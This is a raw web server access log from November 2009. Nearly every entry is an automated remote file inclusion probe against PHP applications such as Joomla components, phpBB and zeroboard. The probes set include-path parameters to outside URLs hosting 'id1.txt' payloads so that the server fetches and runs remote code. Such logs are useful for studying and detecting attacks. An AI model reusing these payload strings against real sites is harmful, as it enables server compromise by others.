91.121.14.194 - - [13/Nov/2009:03:13:15 -0500] "GET /logs/access_log.Q109100300//netcat/modules/auth.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:13:21 -0500] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.47.61.97 - - [13/Nov/2009:03:13:26 -0500] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
61.47.61.97 - - [13/Nov/2009:03:13:26 -0500] "GET /logs/access_log.Q109090100/components/com_forum/download.php?phpbb_root_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
61.47.61.97 - - [13/Nov/2009:03:13:28 -0500] "GET /components/com_forum/download.php?phpbb_root_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
213.171.225.234 - - [13/Nov/2009:03:13:38 -0500] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.abruzzobooking.it/mambots/idxx.txt?%20? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:14:31 -0500] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:14:31 -0500] "GET /logs/access_log.Q109080500%20%20//includes/ktedit/toolbar.php?dirDepth=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:14:34 -0500] "GET /logs/access_log.Q109102300//?_zb_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:14:49 -0500] "GET /logs/error_log.Q109102300//?_zb_path=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:14:53 -0500] "GET //?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:14:53 -0500] "GET /logs/access_log.Q109100700%20%20//?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:14:53 -0500] "GET /logs//?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:15:02 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:15:02 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:15:02 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:15:13 -0500] "GET /logs/error_log.Q109061400%20%20//?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:15:27 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:15:27 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:15:27 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:35 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:35 -0500] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:35 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:35 -0500] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:37 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:37 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:37 -0500] "GET /logs/access_log.Q109063000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:38 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:38 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:38 -0500] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:38 -0500] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:41 -0500] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:50 -0500] "GET //include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:50 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:50 -0500] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:15:51 -0500] "GET /logs/access_log.Q109052500%20%20//include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:16:08 -0500] "GET /logs/error_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.86.17.106 - - [13/Nov/2009:03:16:32 -0500] "GET /logs/error_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:16:40 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:16:40 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:16:40 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:16:57 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:16:57 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:17:00 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:17:00 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:17:00 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:17:01 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:17:15 -0500] "GET /logs//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:17:15 -0500] "GET /logs/access_log.Q109082800//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:17:15 -0500] "GET //export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:17:15 -0500] "GET /logs/access_log.Q109081900//export.php?mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:17:31 -0500] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:17:33 -0500] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:17:42 -0500] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:17:42 -0500] "GET /logs/access_log.Q109081900//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:17:42 -0500] "GET /logs//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:17:43 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:17:43 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:17:54 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:17:54 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:17:54 -0500] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:17:59 -0500] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:17:59 -0500] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:17:59 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:05 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:09 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:09 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:18:10 -0500] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:11 -0500] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:13 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:13 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:14 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:14 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:14 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:18:15 -0500] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:20 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:20 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:20 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:24 -0500] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:25 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:25 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:25 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:30 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:18:31 -0500] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:35 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:35 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:18:35 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:03:18:35 -0500] "GET /logs/error_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:37 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:37 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:40 -0500] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:18:43 -0500] "GET /logs/access_log.Q109081900%20%20//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:18:43 -0500] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:18:43 -0500] "GET /logs//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:18:51 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
115.86.49.6 - - [13/Nov/2009:03:18:57 -0500] "GET /logs/access_log.Q109100300//s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:03:18:58 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:03:18:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
77.221.130.17 - - [13/Nov/2009:03:19:07 -0500] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:19:07 -0500] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:19:32 -0500] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:19:32 -0500] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:19:43 -0500] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:19:43 -0500] "GET /logs/access_log.Q109081900%20%20//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:19:44 -0500] "GET //?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:19:44 -0500] "GET /logs/access_log.Q109081900//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:19:43 -0500] "GET /logs//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:19:44 -0500] "GET /logs//?_zb_path=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:20:23 -0500] "GET /logs/access_log.Q109091600/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:03:20:27 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.247.200.12 - - [13/Nov/2009:03:21:03 -0500] "GET //?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:21:03 -0500] "GET /logs/access_log.Q109100700//?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:21:03 -0500] "GET /logs//?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:21:19 -0500] "GET /logs/access_log.Q109091600/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.247.200.12 - - [13/Nov/2009:03:21:35 -0500] "GET /logs/access_log.Q109061400//?_zb_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:03:21:41 -0500] "GET /logs/access_log.Q109072700%20%20//bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:21:41 -0500] "GET //index.php?option=com_phpshop&page=…//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:21:41 -0500] "GET /logs//index.php?option=com_phpshop&page=…//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:03:21:47 -0500] "GET /logs/access_log.Q109072700%20%20//bemarket/postscript/postscript.php?p_mode=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:22:00 -0500] "GET //include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:22:00 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:22:00 -0500] "GET /logs/access_log.Q109052300//include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:22:00 -0500] "GET /logs/error_log.Q109052200//include/admin.lib.inc.php?site_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:22:54 -0500] "GET //netcat/modules/banner.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:22:54 -0500] "GET /logs//netcat/modules/banner.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.121.14.194 - - [13/Nov/2009:03:22:54 -0500] "GET /logs/access_log.Q109092200//netcat/modules/banner.inc.php?INCLUDE_FOLDER=http://vihorlat.lietame.sk//id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:23:37 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt%20%20? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.98.252.9 - - [13/Nov/2009:03:23:38 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.teamspiritrealty.com/cypress/cas1.txt%20%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
